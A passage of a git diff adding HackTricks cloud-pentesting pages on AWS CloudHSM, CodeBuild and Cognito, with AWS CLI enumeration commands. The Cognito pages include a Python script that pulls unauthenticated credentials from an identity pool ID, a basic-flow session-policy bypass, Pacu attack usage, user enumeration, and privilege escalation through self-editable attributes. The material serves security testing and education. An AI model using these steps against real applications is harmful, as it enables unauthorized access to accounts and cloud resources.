Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution. + +Just like scaling, **performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. 
Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster. + +If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to **replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys. + +**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution. + +**CloudHSM is considerably more expensive than Key Management Service**. CloudHSM is a hardware appliance so you have fix costs to provision the CloudHSM device, then an hourly cost to run the appliance. The cost is multiplied by as many CloudHSM appliances that are required to achieve your specific requirements.\ +Additionally, cross consideration must be made in the purchase of third party software such as SafeNet ProtectV software suites and integration time and effort. Key Management Service is a usage based and depends on the number of keys you have and the input and output operations. 
As key management provides seamless integration with many AWS services, integration costs should be significantly lower. Costs should be considered secondary factor in encryption solutions. Encryption is typically used for security and compliance. + +**With CloudHSM only you have access to the keys** and without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you. + +### CloudHSM Suggestions + +1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS. +2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data. +3. CloudHSM only **supports certain versions of firmware** and software. Before performing any update, make sure the firmware and or software is supported by AWS. You can always contact AWS support to verify if the upgrade guide is unclear. +4. The **network configuration should never be changed.** Remember, it's in a AWS data center and AWS is monitoring base hardware for you. This means that if the hardware fails, they will replace it for you, but only if they know it failed. +5. The **SysLog forward should not be removed or changed**. You can always **add** a SysLog forwarder to direct the logs to your own collection tool. +6. The **SNMP** configuration has the same basic restrictions as the network and SysLog folder. This **should not be changed or removed**. 
An **additional** SNMP configuration is fine, just make sure you do not change the one that is already on the appliance. +7. Another interesting best practice from AWS is **not to change the NTP configuration**. It is not clear what would happen if you did, so keep in mind that if you don't use the same NTP configuration for the rest of your solution then you could have two time sources. Just be aware of this and know that the CloudHSM has to stay with the existing NTP source. + +The initial launch charge for CloudHSM is $5,000 to allocate the hardware appliance dedicated for your use, then there is an hourly charge associated with running CloudHSM that is currently at $1.88 per hour of operation, or approximately $1,373 per month. + +The most common reason to use CloudHSM is compliance standards that you must meet for regulatory reasons. **KMS does not offer data support for asymmetric keys. CloudHSM does let you store asymmetric keys securely**. + +The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH. + +### What is a Hardware Security Module + +A hardware security module (HSM) is a dedicated cryptographic device that is used to generate, store, and manage cryptographic keys and protect sensitive data. It is designed to provide a high level of security by physically and electronically isolating the cryptographic functions from the rest of the system. + +The way an HSM works can vary depending on the specific model and manufacturer, but generally, the following steps occur: + +1. **Key generation**: The HSM generates a random cryptographic key using a secure random number generator. +2. **Key storage**: The key is **stored securely within the HSM, where it can only be accessed by authorized users or processes**. +3. **Key management**: The HSM provides a range of key management functions, including key rotation, backup, and revocation. +4. 
**Cryptographic operations**: The HSM performs a range of cryptographic operations, including encryption, decryption, digital signature, and key exchange. These operations are **performed within the secure environment of the HSM**, which protects against unauthorized access and tampering. +5. **Audit logging**: The HSM logs all cryptographic operations and access attempts, which can be used for compliance and security auditing purposes. + +HSMs can be used for a wide range of applications, including secure online transactions, digital certificates, secure communications, and data encryption. They are often used in industries that require a high level of security, such as finance, healthcare, and government. + +Overall, the high level of security provided by HSMs makes it **very difficult to extract raw keys from them, and attempting to do so is often considered a breach of security**. However, there may be **certain scenarios** where a **raw key could be extracted** by authorized personnel for specific purposes, such as in the case of a key recovery procedure. + +### Enumeration + +``` +TODO +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md b/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md new file mode 100644 index 0000000000..7798cea35f --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md @@ -0,0 +1,102 @@ +# AWS - Codebuild Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## CodeBuild + +AWS **CodeBuild** is recognized as a **fully managed continuous integration service**. The primary purpose of this service is to automate the sequence of compiling source code, executing tests, and packaging the software for deployment purposes. The predominant benefit offered by CodeBuild lies in its ability to alleviate the need for users to provision, manage, and scale their build servers. This convenience is because the service itself manages these tasks. Essential features of AWS CodeBuild encompass: + +1. **Managed Service**: CodeBuild manages and scales the build servers, freeing users from server maintenance. +2. **Continuous Integration**: It integrates with the development and deployment workflow, automating the build and test phases of the software release process. +3. **Package Production**: After the build and test phases, it prepares the software packages, making them ready for deployment. + +AWS CodeBuild seamlessly integrates with other AWS services, enhancing the CI/CD (Continuous Integration/Continuous Deployment) pipeline's efficiency and reliability. + +### **Github/Gitlab/Bitbucket Credentials** + +#### **Default source credentials** + +This is the legacy option where it's possible to configure some **access** (like a Github token or app) that will be **shared across codebuild projects** so all the projects can use this configured set of credentials. + +The stored credentials (tokens, passwords...) are **managed by codebuild** and there isn't any public way to retrieve them from AWS APIs. + +#### Custom source credential + +Depending on the repository platform (Github, Gitlab and Bitbucket) different options are provided. But in general, any option that requires to **store a token or a password will store it as a secret in the secrets manager**. + +This allows **different codebuild projects to use different configured accesses** to the providers instead of just using the configured default one. 
+ +### Enumeration + +```bash +# List external repo creds (such as github tokens) +## It doesn't return the token but just the ARN where it's located +aws codebuild list-source-credentials + +# Projects +aws codebuild list-shared-projects +aws codebuild list-projects +aws codebuild batch-get-projects --names # Check for creds in env vars + +# Builds +aws codebuild list-builds +aws codebuild list-builds-for-project --project-name +aws codebuild list-build-batches +aws codebuild list-build-batches-for-project --project-name + +# Reports +aws codebuild list-reports +aws codebuild describe-test-cases --report-arn +``` + +### Privesc + +In the following page, you can check how to **abuse codebuild permissions to escalate privileges**: + +{% content-ref url="../aws-privilege-escalation/aws-codebuild-privesc.md" %} +[aws-codebuild-privesc.md](../aws-privilege-escalation/aws-codebuild-privesc.md) +{% endcontent-ref %} + +### Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-codebuild-post-exploitation/" %} +[aws-codebuild-post-exploitation](../aws-post-exploitation/aws-codebuild-post-exploitation/) +{% endcontent-ref %} + +### Unauthenticated Access + +{% content-ref url="../aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md" %} +[aws-codebuild-unauthenticated-access.md](../aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md) +{% endcontent-ref %} + +## References + +* [https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md new file mode 100644 index 0000000000..1701910c0d --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md @@ -0,0 +1,130 @@ +# AWS - Cognito Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Cognito + +Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple. + +Central to Amazon Cognito are two primary components: + +1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**. +2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication. + +### **User pools** + +To learn what is a **Cognito User Pool check**: + +{% content-ref url="cognito-user-pools.md" %} +[cognito-user-pools.md](cognito-user-pools.md) +{% endcontent-ref %} + +### **Identity pools** + +The learn what is a **Cognito Identity Pool check**: + +{% content-ref url="cognito-identity-pools.md" %} +[cognito-identity-pools.md](cognito-identity-pools.md) +{% endcontent-ref %} + +## Enumeration + +{% code overflow="wrap" %} +```bash +# List Identity Pools +aws cognito-identity list-identity-pools --max-results 60 +aws cognito-identity describe-identity-pool --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367" +aws cognito-identity list-identities --identity-pool-id --max-results 60 +aws cognito-identity get-identity-pool-roles --identity-pool-id + +# Identities Datasets +## Get dataset of identity id (inside identity pool) +aws cognito-sync list-datasets --identity-pool-id --identity-id +## Get info of the dataset +aws cognito-sync describe-dataset --identity-pool-id --identity-id --dataset-name +## Get dataset records +aws cognito-sync list-records --identity-pool-id --identity-id --dataset-name + +# User Pools +## Get pools +aws cognito-idp list-user-pools --max-results 60 + +## Get users 
+aws cognito-idp list-users --user-pool-id + +## Get groups +aws cognito-idp list-groups --user-pool-id + +## Get users in a group +aws cognito-idp list-users-in-group --user-pool-id --group-name + +## List App IDs of a user pool +aws cognito-idp list-user-pool-clients --user-pool-id + +## List configured identity providers for a user pool +aws cognito-idp list-identity-providers --user-pool-id + +## List user import jobs +aws cognito-idp list-user-import-jobs --user-pool-id --max-results 60 + +## Get MFA config of a user pool +aws cognito-idp get-user-pool-mfa-config --user-pool-id + +## Get risk configuration +aws cognito-idp describe-risk-configuration --user-pool-id +``` +{% endcode %} + +### Identity Pools - Unauthenticated Enumeration + +Just **knowing the Identity Pool ID** you might be able **get credentials of the role associated to unauthenticated** users (if any). [**Check how here**](cognito-identity-pools.md#accessing-iam-roles). + +### User Pools - Unauthenticated Enumeration + +Even if you **don't know a valid username** inside Cognito, you might be able to **enumerate** valid **usernames**, **BF** the **passwords** of even **register a new user** just **knowing the App client ID** (which is usually found in source code). 
[**Check how here**](cognito-user-pools.md#registration)**.** + +## Privesc + +{% content-ref url="../../aws-privilege-escalation/aws-cognito-privesc.md" %} +[aws-cognito-privesc.md](../../aws-privilege-escalation/aws-cognito-privesc.md) +{% endcontent-ref %} + +## Unauthenticated Access + +{% content-ref url="../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md" %} +[aws-cognito-unauthenticated-enum.md](../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md) +{% endcontent-ref %} + +## Persistence + +{% content-ref url="../../aws-persistence/aws-cognito-persistence.md" %} +[aws-cognito-persistence.md](../../aws-persistence/aws-cognito-persistence.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md new file mode 100644 index 0000000000..0ed8cb0223 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md @@ -0,0 +1,225 @@ +# Cognito Identity Pools + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +Identity pools serve a crucial role by enabling your users to **acquire temporary credentials**. These credentials are essential for accessing various AWS services, including but not limited to Amazon S3 and DynamoDB. A notable feature of identity pools is their support for both anonymous guest users and a range of identity providers for user authentication. The supported identity providers include: + +* Amazon Cognito user pools +* Social sign-in options such as Facebook, Google, Login with Amazon, and Sign in with Apple +* Providers compliant with OpenID Connect (OIDC) +* SAML (Security Assertion Markup Language) identity providers +* Developer authenticated identities + +```python +# Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows: +import boto3 + +# Initialize the Amazon Cognito Identity client +client = boto3.client('cognito-identity') + +# Assume you have already created an identity pool and obtained the IdentityPoolId +identity_pool_id = 'your-identity-pool-id' + +# Add an identity provider to the identity pool +response = client.set_identity_pool_roles( + IdentityPoolId=identity_pool_id, + Roles={ + 'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole', + 'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole', + } +) + +# Print the response from AWS +print(response) +``` + +### Cognito Sync + +To generate Identity Pool sessions, you first need to **generate and Identity ID**. This Identity ID is the **identification of the session of that user**. These identifications can have up to 20 datasets that can store up to 1MB of key-value pairs. + +This is **useful to keep information of a user** (who will be always using the same Identity ID). + +Moreover, the service **cognito-sync** is the service that allow to **manage and syncronize this information** (in the datasets, sending info in streams and SNSs msgs...). 
+ +### Tools for pentesting + +* [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. + +For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. + +#### Usage + +Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: + +```bash +Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools +us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients +59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX +``` + +Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account: + +```bash +Pacu (new:test) > run cognito__enum +``` + +* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and identity pool escalation. 
+ +#### Installation + +```bash +$ pip install cognito-scanner +``` + +#### Usage + +```bash +$ cognito-scanner --help +``` + +For more information check https://github.com/padok-team/cognito-scanner + +## Accessing IAM Roles + +### Unauthenticated + +The only thing an attacker need to know to **get AWS credentials** in a Cognito app as unauthenticated user is the **Identity Pool ID**, and this **ID must be hardcoded** in the web/mobile **application** for it to use it. An ID looks like this: `eu-west-1:098e5341-8364-038d-16de-1865e435da3b` (it's not bruteforceable). + +{% hint style="success" %} +The **IAM Cognito unathenticated role created via is called** by default `Cognito_Unauth_Role` +{% endhint %} + +If you find an Identity Pools ID hardcoded and it allows unauthenticated users, you can get AWS credentials with: + +```python +import requests + +region = "us-east-1" +id_pool_id = 'eu-west-1:098e5341-8364-038d-16de-1865e435da3b' +url = f'https://cognito-identity.{region}.amazonaws.com/' +headers = {"X-Amz-Target": "AWSCognitoIdentityService.GetId", "Content-Type": "application/x-amz-json-1.1"} +params = {'IdentityPoolId': id_pool_id} + +r = requests.post(url, json=params, headers=headers) +json_resp = r.json() + +if not "IdentityId" in json_resp: + print(f"Not valid id: {id_pool_id}") + exit + +IdentityId = r.json()["IdentityId"] + +params = {'IdentityId': IdentityId} + +headers["X-Amz-Target"] = "AWSCognitoIdentityService.GetCredentialsForIdentity" +r = requests.post(url, json=params, headers=headers) + +print(r.json()) +``` + +Or you could use the following **aws cli commands**: + +```bash +aws cognito-identity get-id --identity-pool-id --no-sign +aws cognito-identity get-credentials-for-identity --identity-id --no-sign +``` + +{% hint style="warning" %} +Note that by default an unauthenticated cognito **user CANNOT have any permission, even if it was assigned via a policy**. Check the followin section. 
+{% endhint %} + +### Enhanced vs Basic Authentication flow + +The previous section followed the **default enhanced authentication flow**. This flow sets a **restrictive** [**session policy**](../../aws-basic-information/#session-policies) to the IAM role session generated. This policy will only allow the session to [**use the services from this list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services) (even if the role had access to other services). + +However, there is a way to bypass this, if the **Identity pool has "Basic (Classic) Flow" enabled**, the user will be able to obtain a session using that flow which **won't have that restrictive session policy**. + +{% code overflow="wrap" %} +```bash +# Get auth ID +aws cognito-identity get-id --identity-pool-id --no-sign + +# Get login token +aws cognito-identity get-open-id-token --identity-id --no-sign + +# Use login token to get IAM session creds +## If you don't know the role_arn use the previous enhanced flow to get it +aws sts assume-role-with-web-identity --role-arn "arn:aws:iam:::role/" --role-session-name sessionname --web-identity-token --no-sign +``` +{% endcode %} + +{% hint style="warning" %} +If you receive this **error**, it's because the **basic flow is not enabled (default)** + +`An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.` +{% endhint %} + +Having a set of IAM credentials you should check [which access you have](../../#whoami) and try to [escalate privileges](../../aws-privilege-escalation/). + +### Authenticated + +{% hint style="info" %} +Remember that **authenticated users** will be probably granted **different permissions**, so if you can **sign up inside the app**, try doing that and get the new credentials. +{% endhint %} + +There could also be **roles** available for **authenticated users accessing the Identity Poo**l. 
+ +For this you might need to have access to the **identity provider**. If that is a **Cognito User Pool**, maybe you can abuse the default behaviour and **create a new user yourself**. + +{% hint style="success" %} +The **IAM Cognito athenticated role created via is called** by default `Cognito_Auth_Role` +{% endhint %} + +Anyway, the **following example** expects that you have already logged in inside a **Cognito User Pool** used to access the Identity Pool (don't forget that other types of identity providers could also be configured). + +
aws cognito-identity get-id \
+    --identity-pool-id <identity_pool_id> \
+    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
+
+# Get the identity_id from the previous commnad response
+aws cognito-identity get-credentials-for-identity \
+    --identity-id <identity_id> \
+    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
+
+
+# In the IdToken you can find roles a user has access because of User Pool Groups
+# User the --custom-role-arn to get credentials to a specific role
+aws cognito-identity get-credentials-for-identity \
+    --identity-id <identity_id> \
+    --custom-role-arn <role_arn> \
+    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
+
+ +{% hint style="warning" %} +It's possible to **configure different IAM roles depending on the identity provide**r the user is being logged in or even just depending **on the user** (using claims). Therefore, if you have access to different users through the same or different providers, if might be **worth it to login and access the IAM roles of all of them**. +{% endhint %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md new file mode 100644 index 0000000000..d0229cf860 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md @@ -0,0 +1,529 @@ +# Cognito User Pools + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK. + +User pools provide: + +* Sign-up and sign-in services. +* A built-in, customizable web UI to sign in users. +* Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple, and through SAML and OIDC identity providers from your user pool. +* User directory management and user profiles. +* Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification. +* Customized workflows and user migration through AWS Lambda triggers. + +**Source code** of applications will usually also contain the **user pool ID** and the **client application ID**, (and some times the **application secret**?) which are needed for a **user to login** to a Cognito User Pool. + +### Potential attacks + +* **Registration**: By default a user can register himself, so he could create a user for himself. +* **User enumeration**: The registration functionality can be used to find usernames that already exists. This information can be useful for the brute-force attack. +* **Login brute-force**: In the [**Authentication**](cognito-user-pools.md#authentication) section you have all the **methods** that a user have to **login**, you could try to brute-force them **find valid credentials**. 
+ +### Tools for pentesting + +* [Pacu](https://github.com/RhinoSecurityLabs/pacu), now includes the `cognito__enum` and `cognito__attack` modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.\ + For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. + +```bash +# Run cognito__enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account +Pacu (new:test) > run cognito__enum + +# cognito__attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: +Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools +us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients +59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX +``` + +* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and account oracle. Check [this link](https://github.com/padok-team/cognito-scanner) for more info. + +```bash +# Install +pip install cognito-scanner +# Run +cognito-scanner --help +``` + +* [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): This script allows to enumerate valid attributes for users. + +```bash +python cognito-attribute-enu.py -client_id 16f1g98bfuj9i0g3f8be36kkrl +``` + +## Registration + +User Pools allows by **default** to **register new users**. 
+ +```bash +aws cognito-idp sign-up --client-id \ + --username --password \ + --region --no-sign-request +``` + +#### If anyone can register + +You might find an error indicating you that you need to **provide more details** of abut the user: + +``` +An error occurred (InvalidParameterException) when calling the SignUp operation: Attributes did not conform to the schema: address: The attribute is required +``` + +You can provide the needed details with a JSON such as: + +```json +--user-attributes '[{"Name": "email", "Value": "carlospolop@gmail.com"}, {"Name":"gender", "Value": "M"}, {"Name": "address", "Value": "street"}, {"Name": "custom:custom_name", "Value":"supername&\"*$"}]' +``` + +You could use this functionality also to **enumerate existing users.** This is the error message when a user already exists with that name: + +``` +An error occurred (UsernameExistsException) when calling the SignUp operation: User already exists +``` + +{% hint style="info" %} +Note in the previous command how the **custom attributes start with "custom:"**.\ +Also know that when registering you **cannot create for the user new custom attributes**. You can only give value to **default attributes** (even if they aren't required) and **custom attributes specified**. +{% endhint %} + +Or just to test if a client id exists. This is the error if the client-id doesn't exist: + +``` +An error occurred (ResourceNotFoundException) when calling the SignUp operation: User pool client 3ig612gjm56p1ljls1prq2miut does not exist. +``` + +#### If only admin can register users + +You will find this error and you own't be able to register or enumerate users: + +``` +An error occurred (NotAuthorizedException) when calling the SignUp operation: SignUp is not permitted for this user pool +``` + +### Verifying Registration + +Cognito allows to **verify a new user by verifying his email or phone number**. 
Therefore, when creating a user usually you will be required at least the username and password and the **email and/or telephone number**. Just set one **you control** so you will receive the code to **verify your** newly created user **account** like this: + +```bash +aws cognito-idp confirm-sign-up --client-id \ + --username aasdasd2 --confirmation-code \ + --no-sign-request --region us-east-1 +``` + +{% hint style="warning" %} +Even if **looks like you can use the same email** and phone number, when you need to verify the created user Cognito will complain about using the same info and **won't let you verify the account**. +{% endhint %} + +### Privilege Escalation / Updating Attributes + +By default a user can **modify the value of his attributes** with something like: + +```bash +aws cognito-idp update-user-attributes \ + --region us-east-1 --no-sign-request \ + --user-attributes Name=address,Value=street \ + --access-token +``` + +#### Custom attribute privesc + +{% hint style="danger" %} +You might find **custom attributes** being used (such as `isAdmin`), as by default you can **change the values of your own attributes** you might be able to **escalate privileges** changing the value yourself! +{% endhint %} + +#### Email/username modification privesc + +You can use this to **modify the email and phone number** of a user, but then, even if the account remains as verified, those attributes are **set in unverified status** (you need to verify them again). + +{% hint style="warning" %} +You **won't be able to login with email or phone number** until you verify them, but you will be **able to login with the username**.\ +Note that even if the email was modified and not verified it will appear in the ID Token inside the **`email`** **field** and the filed 